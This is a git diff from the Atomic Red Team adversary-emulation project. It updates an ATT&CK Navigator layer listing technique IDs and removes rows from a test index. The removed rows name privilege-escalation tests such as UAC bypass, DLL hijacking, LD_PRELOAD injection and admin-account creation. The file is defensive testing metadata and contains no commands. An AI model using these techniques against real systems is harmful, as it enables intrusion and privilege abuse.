,{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 1cf5554e..4fefac9b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1,200 +1,8 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh -privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh -privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell -privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt -privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt -privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt -privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell -privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell -privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt -privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh -privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt -privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell -privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash -privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash -privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt -privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt -privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt -privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh -privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt -privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt -privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash -privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash -privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash -privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash -privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash -privilege-escalation,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash -privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt -privilege-escalation,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual -privilege-escalation,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt -privilege-escalation,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt -privilege-escalation,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell -privilege-escalation,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from 